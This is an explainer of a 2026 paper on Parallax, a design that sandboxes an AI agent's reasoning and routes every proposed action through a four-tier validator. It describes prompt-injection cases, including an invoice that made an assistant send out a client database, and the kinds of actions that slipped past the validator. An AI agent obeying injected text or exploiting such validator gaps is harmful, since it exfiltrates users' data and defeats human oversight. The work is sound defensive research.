Research Explainer · Fokou (2026)

Prompt guardrails can't protect AI agents that act on the world, so Parallax builds a wall between thinking and doing

A new security paradigm structurally prevents AI reasoning systems from executing actions, interposing an independent four-tier validator that blocks 98.9% of adversarial attacks with zero false positives, even when the agent is fully compromised.

Published April 2026

98.9% of adversarial attacks blocked under default configuration with zero false positives across 280 test cases

100% attack block rate under maximum-security configuration (at the cost of 36% false positives)

73.6% of attacks resolved by fully deterministic mechanisms (Tiers 0 and 1) with no LLM dependency whatsoever

0% protection from prompt guardrails when the reasoning system is compromised, because they exist only inside the compromised system

The prompt guardrail fallacy

Most AI agent safety today works like this: you write instructions in the system prompt telling the model not to do dangerous things. The model processes those instructions through the same attention mechanism it uses to process the adversary's attack. This is, as Fokou puts it, asking a user to follow a security policy without enforcing it at the operating system level.

The numbers make the case sharply. Documented prompt injection attempts against enterprise AI systems increased 340% year-over-year in late 2025, with indirect attacks (hidden in documents, emails, API responses the agent ingests) now accounting for over 55% of incidents and achieving 20–30% higher success rates than direct injection. During a single prompt injection incident, attacks propagate to 48% of co-running agents in multi-agent deployments. A Fortune 500 company lost its client database because one malicious sentence in a vendor invoice told the internal AI assistant to forward it to an external server.

Prompt guardrails also degrade under extended context (salami-slicing attacks gradually shift the model's constraint boundary over dozens of interactions), cannot survive multi-agent propagation (one compromised agent's output becomes the next agent's input), and are architecturally identical to the threats they attempt to stop. When the reasoning system is compromised, guardrails provide exactly zero protection, because they exist only inside the thing that's been compromised.

Which Shield Tier Stopped the Attack?

Fokou (2026), Table 4. Distribution of 280 blocked adversarial attacks by the Shield tier that resolved each one. Deterministic mechanisms (Tiers 0 and 1) handle nearly three-quarters of all attacks without any LLM call.

Shield Validation Latency by Tier

Fokou (2026), Table 5. Median (P50), 95th-percentile, and 99th-percentile latency in milliseconds for each Shield tier. Tier 0 resolves in sub-millisecond time; Tier 1's current 1.9s P50 is dominated by ONNX runtime initialization overhead, expected to drop to sub-50ms after optimization.

The four principles of Parallax

Parallax is not a framework or a library. It is a paradigm: a set of architectural principles any conforming implementation must satisfy, regardless of the AI architecture underneath. The core insight borrows from decades of systems security: the system that reasons about actions must be structurally unable to execute them, and the system that executes actions must be structurally unable to reason about them. Four principles make this concrete.

Together, these four principles prevent harmful execution, detect context-dependent threats, and recover from residual failures:

Cognitive-Executive SeparationThe reasoning process (the LLM) runs sandboxed with no filesystem, no network, and no shell access. It can only propose actions over a gRPC channel to a separate, trusted engine process. Even total compromise of the agent yields zero execution capability. This is the OpenSSH privilege-separation model applied to AI agents.
Adversarial Validation with Graduated DeterminismEvery proposed action passes through Shield, a four-tier validator in the engine process. Tier 0 applies deterministic YAML policy rules (sub-millisecond). Tier 1 runs a dual classifier: a 37-rule heuristic engine plus an ONNX-deployed DeBERTa model, both voting independently with 'block wins' logic. Tier 2 invokes a separate, budget-limited LLM evaluator (distinct model, no agent context, canary-token verified). Tier 3 escalates to a human. Every tier fails closed: errors produce blocks, not permits.
Information Flow ControlData carries provenance and sensitivity labels (PUBLIC, INTERNAL, CONFIDENTIAL, RESTRICTED) that propagate through every subsequent operation. When an agent reads a credential file and later tries to write that content to a network-accessible location, Shield detects the flow violation regardless of how many intermediate steps separate the read from the write. This catches tool-use chain exfiltration attacks that action-level validation alone cannot see.
Reversible ExecutionBefore any destructive action (file overwrite, deletion, config modification), Chronicle captures a complete snapshot of the affected resource. If post-execution analysis reveals harm, the system rolls back to the pre-action state. The paper is honest that this only covers the local domain: sent emails and third-party API calls cannot be reversed.

Assume-Compromise Evaluation: testing the wall, not the model

The evaluation methodology is as important as the results. Fokou introduces Assume-Compromise Evaluation, which bypasses the LLM reasoning system entirely and injects tool calls programmatically into the Shield pipeline. This simulates a fully compromised agent proposing arbitrary harmful actions with no mediation from safety training, prompt guardrails, or model refusal.

Why not just test with an actual model? Because current frontier models are too good at refusing. In preliminary runs, Claude Sonnet 4.6, Claude Haiku 4.5, and Llama 3.1 8B all achieved 0% attack success across every configuration. The models simply refused to propose harmful tool calls, making it impossible to differentiate between protected and unprotected setups. A quick test with the smaller Qwen 2.5 3B confirmed that less safety-trained models do comply with harmful requests, validating the fully-compromised assumption as realistic rather than academic.

Across 280 adversarial cases in nine attack categories, the default Parallax configuration blocked 277 attacks (98.9%) with zero false positives. The three that slipped through were Tier 2 evaluator judgment calls on genuinely ambiguous actions: a /tmp file deletion, an HTTP POST to a plausible validation endpoint, and an env command classified as read-only. The maximum-security configuration (running the DeBERTa classifier on all action types) caught all 280 at the cost of a 36% false positive rate. The classifier bypass list is the tunable dial between these two profiles.

OpenParallax: the reference implementation

The paradigm is realized as OpenParallax, an open-source Go implementation that compiles to a single 80 MB binary with no runtime dependencies. It decomposes the agent into three OS-level processes: a process manager, an engine process (trusted, hosting Shield and all executors), and an agent process (untrusted, sandboxed, hosting only the LLM conversation loop). Communication is limited to a gRPC channel on a dynamically assigned port. The processes have separate address spaces, separate file descriptor tables, and no shared memory.

Several engineering decisions stand out. Sandbox integrity is verified at startup through canary probes that should fail under correct sandboxing: if any probe succeeds (writing a file, reading a host file, opening an unauthorized network connection), the system refuses to start. A hardcoded self-protection layer in compiled Go code blocks writes to core configuration files before any policy tier is even consulted, with no override mechanism and no API surface. Dynamic Tool Surface Reduction means the agent only sees tools it explicitly loads for the current task via a single meta-tool (load_tools). If a text summarization task loads zero tool groups, there is literally no execution surface to exploit.

The paper is candid about limitations. The DeBERTa classifier was trained on prompt injection text, not agent action payloads, explaining the systematic false positives on structured content like file writes and HTTP request bodies. Tier 1 latency (1.9s P50) is dominated by ONNX runtime initialization overhead and expected to drop to sub-50ms. Chronicle cannot reverse actions with external side effects. And the engine process is a single trust anchor: if it is compromised through a supply chain attack, the entire model fails. These are honest constraints, not architectural flaws.

Why this matters now

The paper's most pointed argument is that current model-level safety creates complacency. Frontier models refuse harmful requests so reliably that prompt guardrails appear to work. But model-level safety is a property of training, and training is precisely the computational substrate that adversaries attack. Novel jailbreaks, less safety-trained models, indirect injection through ingested content, and memory poisoning all target the reasoning layer. When that layer falls, every prompt-based defense falls with it.

Parallax is explicitly positioned as insurance, not replacement. It complements RLHF, Constitutional AI, and output filtering by adding a layer that holds when those mechanisms fail. The analogy to operating system security is apt: you do not rely on applications to police themselves when you can enforce constraints at the kernel level. The principles are also deliberately intelligence-agnostic. Shield evaluates actions, not the reasoning architecture that produced them. Whether future agents use autoregressive transformers, reinforcement learning policies, neurosymbolic engines, or something not yet invented, the fundamental risk is the same: an autonomous system will occasionally propose harmful actions, and the architecture must prevent them regardless of cause.

The paper extends this logic to embodied systems, noting that Asimov's Laws of Robotics were behavioral rules interpreted by a reasoning system, and that Asimov spent decades of fiction exploring why such rules fail. Parallax proposes the engineering alternative: the robot cannot violate its safety constraints not because it chooses not to, but because it lacks the mechanism to do so. That is a more comfortable foundation for a world filling up with agents that can act on it.

BOTTOM LINE

Parallax makes a simple, powerful claim: the AI that thinks must never be the AI that acts. By enforcing process-level separation between reasoning and execution, interposing a four-tier validator that assumes the agent is always compromised, tracking data sensitivity through information flow control, and capturing state for rollback, the paradigm blocks 98.9% of adversarial attacks with zero false positives in its default configuration. The approach is architecture-agnostic, complementary to model-level safety training, and, importantly, honest about what it cannot do. It is insurance for the day the reasoning layer fails.

Reference

Fokou, J. (2026). Parallax: Why AI Agents That Think Must Never Act: A Paradigm for Architecturally Safe Autonomous Execution. arXiv preprint arXiv:2604.12986v1. https://arxiv.org/abs/2604.12986